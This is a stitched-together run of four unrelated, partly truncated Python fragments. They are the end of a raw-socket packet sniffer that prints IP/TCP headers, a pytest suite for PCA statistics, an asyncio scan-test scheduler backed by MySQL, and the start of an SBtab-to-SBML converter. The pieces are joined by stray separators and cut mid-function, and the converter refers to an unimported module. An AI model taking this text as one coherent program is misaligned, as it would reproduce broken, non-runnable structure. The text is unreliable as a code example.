for i in self.ip_header(pkt[0][14:34]).items():
a, b = i
print(f"[+] {a} | {b}")
if "Source Address" in a.strip():
src_ip = b
if "Destination Address" in a.strip():
dst_ip = b
if self.logger:
self.log(f"\n[+] {a} | {b}")
msg = "\n[+] TCP Header:"
print(msg)
if self.logger:
self.log(msg)
for i in self.tcp_header(pkt[0][34:54]).items():
a, b = i
print(f"[+] {a} | {b}")
if self.logger:
self.log(f"\n[+] {a} | {b}")
if self.translat:
try:
translation = self.translate(binascii.hexlify(pkt[0]).decode(), src_ip, dst_ip)
print(
"\n[+] Translation Of Network Traffic(gibberish most likely means encrypted traffic):")
print(" ", translation)
except Exception as e:
print("[+] Error with translation.")
else:
translation = self.translate(binascii.hexlify(pkt[0]).decode(), src_ip, dst_ip)
else:
pkt = self.sniffer.recvfrom(65565)
self.log(f"\n\n[(RECV)] Raw Packets Received: {pkt}")
| |
# (c) <NAME>, 2010-2022. MIT License.
import pathlib
import numpy as np
import pandas as pd
import pytest
from pytest import approx
from sklearn.cross_decomposition import PLSRegression
from process_improve.multivariate.methods import (
PCA,
PLS,
MCUVScaler,
SpecificationWarning,
center,
epsqrt,
quick_regress,
scale,
ssq,
)
def test_PCA_SPE_limits():
"""
Simulate data and see if SPE limit cuts off at 5%.
"""
N = 1000
repeats = 50
outliers_95 = []
outliers_99 = []
for k in range(repeats):
# The desired mean values of the sample.
mu = np.array([0.0, 0.0, 0.0])
# The desired covariance matrix.
r = np.array([[5.20, -4.98, -1.00], [-4.98, 5.50, 2.94], [-1.00, 2.94, 2.77]])
X = pd.DataFrame(np.random.multivariate_normal(mu, r, size=N))
scaler = MCUVScaler().fit(X)
mcuv = scaler.fit_transform(X)
A = 2
pca = PCA(n_components=A).fit(mcuv)
SPE_limit_95 = pca.SPE_limit(0.95)
SPE_limit_99 = pca.SPE_limit(0.99)
outliers_95.append(
(pca.squared_prediction_error.iloc[:, A - 1] > SPE_limit_95).sum()
)
outliers_99.append(
(pca.squared_prediction_error.iloc[:, A - 1] > SPE_limit_99).sum()
)
assert np.mean(outliers_95) == approx(0.05 * N, rel=0.1)
assert np.mean(outliers_99) == approx(0.01 * N, rel=0.1)
def test_PCA_foods():
"""
Arrays with no variance should not be able to have variance extracted.
"""
foods = pd.read_csv("https://openmv.net/file/food-texture.csv").drop(
[
"Unnamed: 0",
],
axis=1,
)
scaler = MCUVScaler().fit(foods)
foods_mcuv = scaler.fit_transform(foods)
A = 2
pca = PCA(n_components=A).fit(foods_mcuv)
assert np.linalg.norm(
np.diag(pca.x_scores.T @ pca.x_scores) / (pca.N - 1) - pca.explained_variance_
) == approx(0, abs=epsqrt)
T2_limit_95 = pca.T2_limit(0.95)
assert T2_limit_95 == approx(6.64469, rel=1e-3)
pca.SPE_limit(0.95)
ellipse_x, ellipse_y = pca.ellipse_coordinates(1, 2, 0.95, 100)
assert ellipse_x[-1] == approx(4.48792, rel=1e-5)
assert ellipse_y[-1] == approx(0, rel=1e-7)
@pytest.fixture
def fixture_kamyr_data_missing_value():
folder = (
pathlib.Path(__file__).parents[1]
/ "process_improve"
/ "datasets"
/ "multivariate"
)
return pd.read_csv(
folder / "kamyr.csv",
index_col=None,
header=None,
)
def test_PCA_missing_data(fixture_kamyr_data_missing_value):
X_mcuv = MCUVScaler().fit_transform(fixture_kamyr_data_missing_value)
# Build the model
A = 2
pca = PCA(n_components=A)
assert pca.missing_data_settings is None
# Check that default missing data options were used
model = pca.fit(X_mcuv)
assert isinstance(model.missing_data_settings, dict)
assert "md_tol" in model.missing_data_settings
assert np.linalg.norm(
(model.loadings.T @ model.loadings) - np.eye(model.A)
) == approx(0, abs=1e-2)
def test_PCA_missing_data_as_numpy(fixture_kamyr_data_missing_value):
X_mcuv = MCUVScaler().fit_transform(fixture_kamyr_data_missing_value.values)
# Build the model
A = 2
pca = PCA(n_components=A)
assert pca.missing_data_settings is None
# Check that default missing data options were used
model = pca.fit(X_mcuv)
assert isinstance(model.missing_data_settings, dict)
assert "md_tol" in model.missing_data_settings
assert np.linalg.norm(
(model.loadings.T @ model.loadings) - np.eye(model.A)
) == approx(0, abs=1e-2)
@pytest.fixture
def fixture_mv_utilities():
"""
Multivariate methods depend on an internal regression and Sum of Squares
calculations. This code tests those crucial steps.
"""
x = np.asarray([1, 2, 3, 4, 5, 6]).reshape(6, 1)
Y = np.asarray(
[
[1, 2, 3, 4, 5, 6],
[6, 5, 4, 3, 2, 1],
[0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, np.NaN, 3, np.NaN, 5, np.NaN],
]
)
Y = Y.T
return x, Y
def test_ssq(fixture_mv_utilities):
x, _ = fixture_mv_utilities
assert (1 + 2 * 2 + 3 * 3 + 4 * 4 + 5 * 5 + 6 * 6) == approx(ssq(x), abs=1e-9)
def test_quick_regress(fixture_mv_utilities):
x, Y = fixture_mv_utilities
out = quick_regress(Y, x).ravel()
assert 1 == approx(out[0], abs=1e-9)
assert 0.61538462 == approx(out[1], abs=1e-8)
assert 0 == approx(out[2], abs=1e-9)
# Checked against R: summary(lm(c(1,1,1,1,1,1) ~ seq(6) + 0))
assert 0.23077 == approx(out[3], abs=1e-6)
# Checked against what is expected: (1 + 3^2 + 5^2)/(1 + 3^2 + 5^2)
assert 1.0 == approx(out[4], abs=1e-14)
@pytest.fixture
def fixture_tablet_spectra_data():
"""
Verifies the PCA model for the case of no missing data.
# R code:
# -------
# Read large data file
file <- 'http://openmv.net/file/tablet-spectra.csv'
spectra <- read.csv(file, header = FALSE, row.names = 1)
# Only extract 4 components, but
# center and scale the data before
# calculation the components
model.pca <- prcomp(spectra,
center = TRUE,
scale =TRUE,
rank. = 4)
summary(model.pca)
Importance of first k=4 (out of 460) components:
PC1 PC2 PC3 PC4
Standard deviation 21.8835 10.9748 3.60075 3.27081
Proportion of Variance 0.7368 0.1853 0.01995 0.01646
Cumulative Proportion 0.7368 0.9221 0.94200 0.95846
# T' * T on the scores matrix T:
t(model.pca$x) %*% model.pca$x
PC1 PC2 PC3 PC4
PC1 2.198092e+05 6.885159e-11 -1.134026e-11 3.454659e-11
PC2 6.885159e-11 5.528459e+04 2.042206e-10 5.821477e-11
PC3 -1.134026e-11 2.042206e-10 5.951125e+03 7.815970e-13
PC4 3.454659e-11 5.821477e-11 7.815970e-13 4.910481e+03
"""
folder = (
pathlib.Path(__file__).parents[1]
/ "process_improve"
/ "datasets"
/ "multivariate"
)
spectra = pd.read_csv(
folder / "tablet-spectra.csv",
index_col=0,
header=None,
)
# Ignoring values < 1E-8 (round them to zero) from the R output above.
known_scores_covar = np.array(
[
[2.198092e05, 0, 0, 0],
[0, 5.528459e04, 0, 0],
[0, 0, 5.951125e03, 0],
[0, 0, 0, 4.910481e03],
]
)
return spectra, known_scores_covar
def test_MCUV_centering(fixture_tablet_spectra_data):
"""
Mean centering of the testing data.
"""
spectra, _ = fixture_tablet_spectra_data
X_mcuv = MCUVScaler().fit_transform(spectra)
assert 0.0 == approx(np.max(np.abs(X_mcuv.mean(axis=0))), rel=1e-9)
def test_MCUV_scaling(fixture_tablet_spectra_data):
"""Scaling by standard deviation."""
spectra, _ = fixture_tablet_spectra_data
X_mcuv = MCUVScaler().fit_transform(spectra)
assert 1 == approx(np.min(np.abs(X_mcuv.std(axis=0))), 1e-10)
assert 1 == approx(X_mcuv.std(), 1e-10)
def test_PCA_tablet_spectra(fixture_tablet_spectra_data):
r"""
PCA characteristics:
1. model's loadings must be orthogonal if there are no missing data.
P.T * P = I
2. model's loadings must be of unit length (norm = 1.0)
P.T * P = I
3. model's scores must be orthogonal
T.T * T is a diagonal matrix when there's no missing data
4. each earlier score's variance must be >= variance of later score
PCA models have the following properties:
* :math:`p_i'p_j' = 0` for :math:`i\neq j`; i.e. :math:`p_i \perp p_j`
* :math:`t_i't_j' = 0` for :math:`i\neq j`; i.e. :math:`t_i \perp t_j`
* :math:`P'P = I_A` when extracting :math:`A` components
* :math:`P_{all} \text{ is a } \min(N,K) \times \min(N,K)` matrix, for all components
* :math:`T_{all} \text{ is a } \min(N,K) \times \min(N,K)` matrix, for all components
(it is just a rearrangement of X)
* :math:`\text{SVD}(X): UDV' = X` and :math:`V' = P'` and :math:`UD = T`
"""
spectra, known_scores_covar = fixture_tablet_spectra_data
# Number of components to calculate
model = PCA(n_components=2)
model.fit(scale(center(spectra)))
# P'P = identity matrix of size A x A
orthogonal_check = model.loadings.T @ model.loadings
assert 0.0 == approx(np.linalg.norm(orthogonal_check - np.eye(model.A)), rel=1e-9)
# Check the R2 value against the R software output
assert model.R2cum[1] == approx(0.7368, rel=1e-3)
assert model.R2cum[2] == approx(0.9221, rel=1e-2)
# Unit length: actually checked above, via subtraction with I matrix.
# Check if scores are orthogonal
scores_covar = model.x_scores.T @ model.x_scores
for i in range(model.A):
for j in range(model.A):
# Technically not need, but more explict this way.
if i == j:
assert scores_covar.iloc[i, j] == approx(
known_scores_covar[i, j], rel=1e-2
)
else:
assert scores_covar.iloc[i, j] == approx(
known_scores_covar[i, j], abs=1e-4
)
if i >= 1:
assert scores_covar.iloc[j, j] > scores_covar.iloc[i, i]
# Check the model against an SVD: this raw data set has no missing
# data, so the SVD should be faster and more accurate than NIPALS
autoscaled_X = scale(center(spectra))
u, s, v = np.linalg.svd(autoscaled_X)
loadings_delta = np.linalg.norm(
np.abs(v[0 : model.A, :]) - np.abs(model.loadings.T)
)
assert loadings_delta == approx(0, abs=1e-8)
# It is not possible, it seems, to get the scores to match the SVD
# scores. Numerical error?
def test_PCA_errors_no_variance_to_start():
"""
Arrays with no variance should seem to work, but should have no variability explained.
"""
K, N, A = 17, 12, 5
data = pd.DataFrame(np.zeros((N, K)))
model = PCA(n_components=A)
# with pytest.raises(RuntimeError):
model.fit(data)
assert np.sum(model.x_scores.values) == approx(0, abs=epsqrt)
assert model.R2cum.sum() == approx(0, abs=epsqrt)
assert np.isnan(model.R2cum[A - 1])
def test_PCA_invalid_calls():
"""
Tests various invalid calls, and corresponding error messages.
"""
K, N, A = 4, 3, 5
data = pd.DataFrame(np.random.uniform(low=-1, high=1, size=(N, K)))
with pytest.warns(
SpecificationWarning,
match=r"The requested number of components is more than can be computed from data(.*)",
):
model = PCA(n_components=A)
model.fit(data)
data.iloc[0, 0] = np.nan
with pytest.raises(AssertionError, match="Tolerance must exceed machine precision"):
_ = PCA(
n_components=A, missing_data_settings=dict(md_method="nipals", md_tol=0)
).fit(data)
with pytest.raises(
AssertionError, match=r"Missing data method is not recognized(.*)"
):
_ = PCA(n_components=A, missing_data_settings={"md_method": "SCP"}).fit(data)
# TODO: replace with a check to ensure the data is in a DataFrame.
# from scipy.sparse import csr_matrix
# sparse_data = csr_matrix([[1, 2, 0], [0, 0, 3], [4, 0, 5]])
# with pytest.raises(TypeError, match="This PCA class does not support sparse input."):
# model = PCA(n_components=2)
# model.fit(sparse_data)
def test_PCA_no_more_variance():
"""
Create a rank 2 matrix and it should fail on the 3rd component.
"""
K = 17
N = 12
A = 3
T = | |
#!/usr/bin/env python3
# Copyright 2004-present Facebook. All Rights Reserved.
import asyncio
import logging
import time
from contextlib import suppress
from datetime import datetime
from enum import Enum
from typing import Dict, Iterable, NoReturn, Optional, Tuple
from croniter import croniter
from sqlalchemy import delete, func, insert, join, select, update
from tglib.clients import MySQLClient
from .models import (
ConnectivityResults,
InterferenceResults,
ScanMode,
ScanResults,
ScanTestExecution,
ScanTestParams,
ScanTestSchedule,
ScanTestStatus,
ScanType,
)
from .scan import ScanTest
from .utils.alerts import Alerts, Severity
class Schedule:
def __init__(self, enabled: bool, cron_expr: str) -> None:
self.enabled = enabled
self.cron_expr = cron_expr
self.task: Optional[asyncio.Task] = None
async def start(self, test: ScanTest, params_id: int) -> NoReturn:
"""Start the schedule task.
Loops forever and tries to start a new scan execution when the cron
expression is evaluated.
"""
iter = croniter(self.cron_expr, datetime.now())
while True:
logging.info(
f"{test.type.name} scan is scheduled for "
f"{iter.get_next(datetime)} on {test.network_name}"
)
# Sleep until it is time to run
await asyncio.sleep(iter.get_current() - time.time())
# Skip if the schedule is disabled
if not self.enabled:
logging.info("Schedule is currently disabled, skipping...")
continue
# Start the scan
await Scheduler.start_execution(test, params_id)
async def stop(self) -> bool:
"""Stop the schedule task.
Cancel the task and await the result.
"""
# Cancel the task
if self.task is None or not self.task.cancel():
return False
with suppress(asyncio.CancelledError):
await self.task
return True
class Scheduler:
_schedules: Dict[int, Schedule] = {}
executions: Dict[int, ScanTest] = {}
SCAN_START_DELAY_S = 5
CLEAN_UP_DELAY_S = 60
@classmethod
def has_schedule(cls, schedule_id: int) -> bool:
"""Verify that a schedule_id belongs to a running schedule."""
return schedule_id in cls._schedules
@classmethod
def get_execution(
cls, token: int, network_name: str
) -> Optional[Tuple[int, ScanTest]]:
"""Get the test execution and ID for a particular scan token."""
for id, execution in cls.executions.items():
if execution.network_name == network_name and token in range(
execution.start_token, execution.end_token + 1 # type: ignore
):
return id, execution
return None
@classmethod
async def restart(cls) -> None:
"""Mark all stale running executions as FAILED and restart the schedules."""
async with MySQLClient().lease() as sa_conn:
update_execution_query = (
update(ScanTestExecution)
.where(
(ScanTestExecution.status == ScanTestStatus.QUEUED)
| (ScanTestExecution.status == ScanTestStatus.RUNNING)
)
.values(status=ScanTestStatus.FAILED, end_dt=datetime.utcnow())
)
await sa_conn.execute(update_execution_query)
await sa_conn.connection.commit()
# Start all of the schedules in the DB
for row in await cls.list_schedules():
test = ScanTest(row.network_name, row.type, row.mode, row.options)
schedule = Schedule(row.enabled, row.cron_expr)
cls._schedules[row.id] = schedule
schedule.task = asyncio.create_task(schedule.start(test, row.params_id))
@classmethod
async def add_schedule(cls, schedule: Schedule, test: ScanTest) -> int:
"""Add a new schedule to the DB and start the internal task."""
async with MySQLClient().lease() as sa_conn:
insert_schedule_query = insert(ScanTestSchedule).values(
enabled=schedule.enabled, cron_expr=schedule.cron_expr
)
schedule_row = await sa_conn.execute(insert_schedule_query)
schedule_id: int = schedule_row.lastrowid
insert_params_query = insert(ScanTestParams).values(
schedule_id=schedule_id,
network_name=test.network_name,
type=test.type,
mode=test.mode,
options=test.options,
)
params_row = await sa_conn.execute(insert_params_query)
params_id = params_row.lastrowid
await sa_conn.connection.commit()
cls._schedules[schedule_id] = schedule
schedule.task = asyncio.create_task(schedule.start(test, params_id))
return schedule_id
@classmethod
async def modify_schedule(
cls, schedule_id: int, schedule: Schedule, test: ScanTest
) -> bool:
"""Stop the running schedule, update the DB, and restart."""
async with MySQLClient().lease() as sa_conn:
update_schedule_query = (
update(ScanTestSchedule)
.where(ScanTestSchedule.id == schedule_id)
.values(enabled=schedule.enabled, cron_expr=schedule.cron_expr)
)
await sa_conn.execute(update_schedule_query)
get_params_query = (
select([ScanTestParams])
.where(ScanTestParams.schedule_id == schedule_id)
.order_by(ScanTestParams.id.desc())
.limit(1)
)
cursor = await sa_conn.execute(get_params_query)
params_row = await cursor.first()
params_id = params_row.id
# Insert new params row if the values differ
if not (
params_row.network_name == test.network_name
and params_row.type == test.type
and params_row.mode == test.mode
and params_row.options == test.options
):
insert_params_query = insert(ScanTestParams).values(
schedule_id=schedule_id,
network_name=test.network_name,
type=test.type,
mode=test.mode,
options=test.options,
)
params_row = await sa_conn.execute(insert_params_query)
params_id = params_row.lastrowid
await sa_conn.connection.commit()
# Stop the existing schedule
prev_schedule = cls._schedules[schedule_id]
if not await prev_schedule.stop():
return False
# Start the new schedule
cls._schedules[schedule_id] = schedule
schedule.task = asyncio.create_task(schedule.start(test, params_id))
return True
@classmethod
async def delete_schedule(cls, schedule_id: int) -> bool:
"""Stop the schedule and delete the entry from the DB."""
async with MySQLClient().lease() as sa_conn:
query = delete(ScanTestSchedule).where(ScanTestSchedule.id == schedule_id)
await sa_conn.execute(query)
await sa_conn.connection.commit()
schedule = cls._schedules[schedule_id]
if not await schedule.stop():
return False
del cls._schedules[schedule_id]
return True
@classmethod
async def start_execution(
cls, test: ScanTest, params_id: Optional[int] = None
) -> Optional[int]:
"""Add a new execution to the DB and start the internal task."""
async with MySQLClient().lease() as sa_conn:
if params_id is None:
insert_params_query = insert(ScanTestParams).values(
network_name=test.network_name,
type=test.type,
mode=test.mode,
options=test.options,
)
params_row = await sa_conn.execute(insert_params_query)
params_id = params_row.lastrowid
insert_execution_query = insert(ScanTestExecution).values(
params_id=params_id, status=ScanTestStatus.QUEUED
)
execution_row = await sa_conn.execute(insert_execution_query)
execution_id: int = execution_row.lastrowid
await sa_conn.connection.commit()
# Start the test
await test.start(execution_id, cls.SCAN_START_DELAY_S)
if test.start_delay_s is None or test.end_delay_s is None:
await Alerts.post(
execution_id,
f"Scan test for execution id {execution_id} failed to start.",
Severity.CRITICAL,
)
return None
cls.executions[execution_id] = test
await Alerts.post(
execution_id,
f"Successfully started scan test with execution id {execution_id}.",
Severity.INFO,
test.start_delay_s,
test.end_delay_s + cls.CLEAN_UP_DELAY_S,
)
# Schedule task for updating execution status to RUNNING
loop = asyncio.get_event_loop()
loop.call_later(
test.start_delay_s,
asyncio.create_task,
cls.update_execution_status(execution_id, ScanTestStatus.RUNNING),
)
# Schedule task for updating execution status to FAILED
loop.call_later(
test.end_delay_s + cls.CLEAN_UP_DELAY_S,
asyncio.create_task,
cls.cleanup_execution_status(test, execution_id),
)
return execution_id
@classmethod
async def cleanup_execution_status(cls, test: ScanTest, execution_id: int) -> None:
"""Mark the execution as FINISHED if we receive atleast one scan response.
If we do not receive any scan responses, mark the test as FAILED & send alert.
"""
async with MySQLClient().lease() as sa_conn:
get_execution_query = select([ScanTestExecution.status]).where(
ScanTestExecution.id == execution_id
)
cursor = await sa_conn.execute(get_execution_query)
execution_row = await cursor.first()
if execution_row and execution_row.status == ScanTestStatus.FINISHED:
return None
status = (
ScanTestStatus.FAILED
if test.token_count == len(test.token_range)
else ScanTestStatus.FINISHED
)
await cls.update_execution_status(execution_id, status, datetime.utcnow())
if status == ScanTestStatus.FAILED:
await Alerts.post(
execution_id,
f"Scan test for execution id {execution_id} failed. "
"Did not receive any scan responses.",
Severity.CRITICAL,
)
@classmethod
async def update_execution_status(
cls, execution_id: int, status: Enum, end_dt: Optional[datetime] = None
) -> None:
"""Update status of scan execution."""
logging.info(f"Updating execution status for id {execution_id} to {status}")
async with MySQLClient().lease() as sa_conn:
update_execution_query = (
update(ScanTestExecution)
.where(ScanTestExecution.id == execution_id)
.values(status=status, end_dt=end_dt)
)
await sa_conn.execute(update_execution_query)
await sa_conn.connection.commit()
@staticmethod
async def describe_schedule(
schedule_id: int,
) -> Optional[Tuple[Iterable, Iterable]]:
"""Fetch a particular schedule and its execution history given the ID."""
async with MySQLClient().lease() as sa_conn:
get_schedule_query = select([ScanTestSchedule]).where(
ScanTestSchedule.id == schedule_id
)
cursor = await sa_conn.execute(get_schedule_query)
schedule = await cursor.first()
if not schedule:
return None
get_executions_query = select(
[
ScanTestParams.network_name,
ScanTestParams.type,
ScanTestParams.mode,
ScanTestParams.options,
ScanTestExecution,
]
).select_from(
join(
join(
ScanTestParams,
ScanTestSchedule,
ScanTestParams.schedule_id == ScanTestSchedule.id,
),
ScanTestExecution,
ScanTestExecution.params_id == ScanTestParams.id,
)
)
cursor = await sa_conn.execute(get_executions_query)
return schedule, await cursor.fetchall()
@staticmethod
async def list_schedules(
network_name: Optional[str] = None,
type: Optional[ScanType] = None,
mode: Optional[ScanMode] = None,
) -> Iterable:
"""Fetch all the schedules, or a subset, with optional filtering."""
async with MySQLClient().lease() as sa_conn:
query = (
select(
[
ScanTestSchedule,
ScanTestParams.id.label("params_id"),
ScanTestParams.network_name,
ScanTestParams.type,
ScanTestParams.mode,
ScanTestParams.options,
]
)
.select_from(
join(
ScanTestParams,
ScanTestSchedule,
ScanTestParams.schedule_id == ScanTestSchedule.id,
)
)
.where(
ScanTestParams.id.in_(
select([func.max(ScanTestParams.id)]).group_by(
ScanTestParams.schedule_id
)
)
)
)
# Add filter conditions
if network_name is not None:
query = query.where(ScanTestParams.network_name == network_name)
if type is not None:
query = query.where(ScanTestParams.type == type)
if mode is not None:
query = query.where(ScanTestParams.mode == mode)
cursor = await sa_conn.execute(query)
schedules: Iterable = await cursor.fetchall()
return schedules
@staticmethod
async def describe_execution(
execution_id: int,
) -> Optional[Tuple[Iterable, Iterable, Iterable, Iterable]]:
"""Fetch a particular execution given the ID."""
async with MySQLClient().lease() as sa_conn:
get_execution_query = (
select(
[
ScanTestExecution,
ScanTestParams.network_name,
ScanTestParams.type,
ScanTestParams.mode,
ScanTestParams.options,
]
)
.select_from(
join(
ScanTestExecution,
ScanTestParams,
ScanTestExecution.params_id == ScanTestParams.id,
)
)
.where(ScanTestExecution.id == execution_id)
)
cursor = await sa_conn.execute(get_execution_query)
execution = await cursor.first()
if not execution:
return None
ignore_cols = {"id", "execution_id", "type", "mode", "results_path"}
get_results_query = select(
filter(
lambda col: col.key not in ignore_cols,
ScanResults.__table__.columns,
)
).where(ScanResults.execution_id == execution_id)
cursor = await sa_conn.execute(get_results_query)
results = await cursor.fetchall()
get_connectivity_results_query = select(
filter(
lambda col: col.key not in ignore_cols,
ConnectivityResults.__table__.columns,
)
).where(ConnectivityResults.execution_id == execution_id)
cursor = await sa_conn.execute(get_connectivity_results_query)
connectivity_results = await cursor.fetchall()
get_interference_results_query = select(
filter(
lambda col: col.key not in ignore_cols,
InterferenceResults.__table__.columns,
)
).where(InterferenceResults.execution_id == execution_id)
cursor = await sa_conn.execute(get_interference_results_query)
return execution, results, connectivity_results, await cursor.fetchall()
@staticmethod
async def list_executions(
network_name: Optional[str] = None,
type: Optional[ScanType] = None,
mode: Optional[ScanMode] = None,
status: Optional[ScanTestStatus] = None,
start_dt: Optional[datetime] = None,
) -> Iterable:
"""Fetch all the executions, or a subset, with optional filtering."""
async with MySQLClient().lease() as | |
"""
SBtab2SBML
==========
Python script that converts SBtab file/s to SBML.
"""
#!/usr/bin/env python
import re, libsbml
import SBtab
import string
import random
import sys
#all allowed SBtab types
sbtab_types = ['Quantity','Event','Rule']
urns = ["obo.chebi","kegg.compound","kegg.reaction","obo.go","obo.sgd","biomodels.sbo","ec-code","kegg.orthology","uniprot"]
class ConversionError(Exception):
'''
Base class for errors in the SBtab conversion class.
'''
def __init__(self,message):
self.message = message
def __str__(self):
return self.message
class SBtabDocument:
'''
SBtab document to be converted to SBML model
'''
def __init__(self, sbtab, filename, tabs=1):
'''
Initalizes SBtab document, checks it for SBtab count.
If there are more than 1 SBtab file to be converted, provide a "tabs" parameter higher than 1.
Parameters
----------
sbtab : str
SBtab file as string representation.
filename : str
SBtab file name.
tabs : int
Amount of SBtab tables in the provided file.
'''
self.filename = filename
if self.filename.endswith('tsv') or self.filename.endswith('csv') or self.filename.endswith('.xls'): pass
else: raise ConversionError('The given file format is not supported: %s' % self.filename)
self.document = [sbtab]
self.tabs = tabs
self.unit_mM = False
self.unit_mpdw = False
self.checkTabs() #check how many SBtabs are given in the document
def checkTabs(self):
'''
Checks, how many SBtab files are given by the user and saves them
in a list, moreover stores the SBtab types in a dict linking to the SBtabs.
'''
self.type2sbtab = {}
#if there are more than one SBtabs given in single files that might be comprised of several SBtabs:
if self.tabs > 1:
for single_document in self.document[0]:
#check for several SBtabs in one document
document_rows = single_document.split('\n')
tabs_in_document = self.getAmountOfTables(document_rows)
if tabs_in_document > 1:
sbtabs = self.splitDocumentInTables(document_rows)
else: sbtabs = [document_rows]
#generate SBtab class instance for every SBtab
for sbtab in sbtabs:
sbtabtsv = self.unifySBtab(sbtab)
if sbtabtsv == False: continue
new_tablib_obj = tablibIO.importSetNew(sbtabtsv,self.filename,separator='\t')
single_tab = SBtab.SBtabTable(new_tablib_obj,self.filename)
if single_tab.table_type in self.type2sbtab.keys():
fn = random_number = str(random.randint(0,1000))
self.type2sbtab[single_tab.table_type+'_'+fn] = single_tab
else: self.type2sbtab[single_tab.table_type] = single_tab
#elif there is only one document given, possibly consisting of several SBtabs
else:
#check for several SBtabs in one document
document_rows = self.document[0].split('\n')
tabs_in_document = self.getAmountOfTables(document_rows)
if tabs_in_document > 1: sbtabs = self.splitDocumentInTables(document_rows)
else: sbtabs = [document_rows]
#generate SBtab class instance for every SBtab
for sbtab in sbtabs:
as_sbtab = '\n'.join(sbtab)
single_tab = SBtab.SBtabTable(as_sbtab, self.filename)
self.type2sbtab[single_tab.table_type] = single_tab
def unifySBtab(self,sbtab):
'''
If we have a list of heterogeneous SBtab files, we have to unify them to one common delimiter; we choose \t arbitrarily.
Parameters
----------
sbtab : str
SBtab file as string representation.
'''
new_tab = []
for row in sbtab:
if row.startswith('!!'): continue
if row.startswith('!'):
columns = row
if '\t' in columns:
delimiter = '\t'
new_tab.append(sbtab[0])
new_tab.append(sbtab[1])
continue
elif ';' in columns:
delimiter = ';'
new_tab.append(sbtab[0].replace(delimiter,'\t'))
new_tab.append(sbtab[1].replace(delimiter,'\t'))
continue
elif ',' in columns:
delimiter = ','
new_tab.append(sbtab[0].replace(delimiter,'\t'))
new_tab.append(sbtab[1].replace(delimiter,'\t'))
continue
else:
print('The delimiter of one of the SBtabs could not be identified. Please check.')
else:
try: new_tab.append(row.replace(delimiter,'\t'))
except: return False
new_tab = '\n'.join(new_tab)
return new_tab
def getAmountOfTables(self,document_rows):
'''
Counts the SBtab tables that are present in the document.
Parameters
----------
document_rows : str
Whole SBtab document as a string representation.
'''
counter = 0
for row in document_rows:
if row.startswith('!!'):
counter += 1
return counter
def splitDocumentInTables(self,document_rows):
'''
If the document contains more than one SBtab, this function splits the document into the single SBtabs.
Parameters
----------
document_rows : str
Whole SBtab document as a string representation.
'''
single_sbtab = [document_rows[0]]
sbtab_list = []
for row in document_rows[1:]:
if row.split('\t')[0] == '':
continue
if not row.startswith('!!'):
single_sbtab.append(row)
else:
sbtab_list.append(single_sbtab)
single_sbtab = [row]
sbtab_list.append(single_sbtab)
return sbtab_list
def makeSBML(self):
'''
Generates the SBML file using the provided SBtab file/s.
'''
# initialize new model
self.warnings = []
self.new_document = libsbml.SBMLDocument()
self.new_model = self.new_document.createModel()
self.new_model.setId('default_id')
self.new_model.setName('default_name')
self.new_document.setLevelAndVersion(2,4)
self.reaction_list = []
self.species_list = []
self.compartment_list = []
self.modifier_list = []
self.id2sbmlid = {}
strikes = 1
valid = True
newSBML = False
while valid:
#0st order: create compartments
try: self.checkForCompartments()
except:
self.warnings.append('Error: The compartment initialisation crashed. Please check for valid compartment information.')
break
#1st order of bizness: due to the right modeling order of SBML, we first check for a compound SBtab
if 'Compound' in self.type2sbtab.keys():
try: self.compoundSBtab()
except:
self.warnings.append('Warning: The provided compounds could not be initialised. Please check for valid compound information.')
else: strikes += 1
#2nd order of bizness: Work the Reaction SBtab (mandatory)
if 'Reaction' in self.type2sbtab.keys():
try:
self.reactionSBtab()
except:
self.warnings.append('Error: The provided reaction information could not be converted. Please check for valid reaction information.')
break
else: strikes += 1
#3rd order: check, which other SBtabs are given
for sbtab in sbtab_types:
try:
self.type2sbtab[sbtab]
name = 'self.'+sbtab.lower()+'SBtab()'
eval(name)
except:
pass
#Last, but not least: generate the SBML model
#libsbml.writeSBML(self.new_document,'New_Model.xml')
newSBML = libsbml.writeSBMLToString(self.new_document)
break
if strikes < 3: return newSBML,self.warnings
else: return False,['There was no or not sufficient model information available to build an SBML model.']
def getWarningOnly(self):
'''
Returns warnings from the SBML conversion.
'''
return self.warnings
def checkForCompartments(self):
'''
If there is no Compartment SBtab AND no compartments given in the other provided SBtab files, a default
compartment needs to be set.
'''
self.def_comp_set = False #has a default compartment been set?
#1. check for compartment SBtab
try:
self.compartmentSBtab()
return True
except:
pass
#2. if there was no compartment SBtab given, check whether it is given in the other SBtabs
try:
sbtab = self.type2sbtab['Reaction']
sbtab.columns_dict['!Location']
for row in sbtab.value_rows:
if row[sbtab.columns_dict['!Location']] != '':
return True
except:
pass
#3. No compartment yet? Try the Compound SBtab (if present)
try:
sbtab = self.type2sbtab['Compound']
sbtab.columns_dict['!Location']
for row in sbtab.value_rows:
if row[sbtab.columns_dict['!Location']] != '':
return True
except:
pass
#4. Nothing yet? Then create a default compartment
self.def_comp_set = True
default_compartment = self.new_model.createCompartment()
default_compartment.setId('Default_Compartment')
default_compartment.setName('Default_Compartment')
default_compartment.setSize(1)
self.compartment_list.append('Default_Compartment')
return True
def setAnnotation(self,element,annotation,urn,elementtype):
'''
Sets an annotation for a given SBML element.
Parameters
----------
element : libsbml object
Element that needs to be annotated.
annotation : str
The identifier part of the annotation string.
urn : str
URN that links to the external web resource.
elementtype : str
What kind of element needs to be annotated? Model or Biological?
'''
element.setMetaId(element.getId()+"_meta")
cv_term = libsbml.CVTerm()
if elementtype == 'Model':
cv_term.setQualifierType(0)
cv_term.setModelQualifierType(libsbml.BQB_IS)
else:
cv_term.setQualifierType(1)
cv_term.setBiologicalQualifierType(libsbml.BQB_IS)
resource_term = "http://identifiers.org/"+urn+'/'+annotation
cv_term.addResource(resource_term)
return cv_term
def compartmentSBtab(self):
'''
Extracts the information from the Compartment SBtab and writes it to the model.
'''
sbtab = self.type2sbtab['Compartment']
comp2size = {}
#complement the missing compartments
for row in sbtab.value_rows:
if row[sbtab.columns_dict['!ID']] not in self.compartment_list:
compartment = self.new_model.createCompartment()
if '!Location:SBML:compartment:id' in sbtab.columns and row[sbtab.columns_dict['!Location:SBML:compartment:id']] != '':
compartment.setId(str(row[sbtab.columns_dict['!Location:SBML:compartment:id']]))
else:
compartment.setId(str(row[sbtab.columns_dict['!ID']]))
if '!Name' in sbtab.columns and row[sbtab.columns_dict['!Name']] != '':
compartment.setName(str(row[sbtab.columns_dict['!Name']]))
else:
compartment.setName(str(row[sbtab.columns_dict['!Compartment']]))
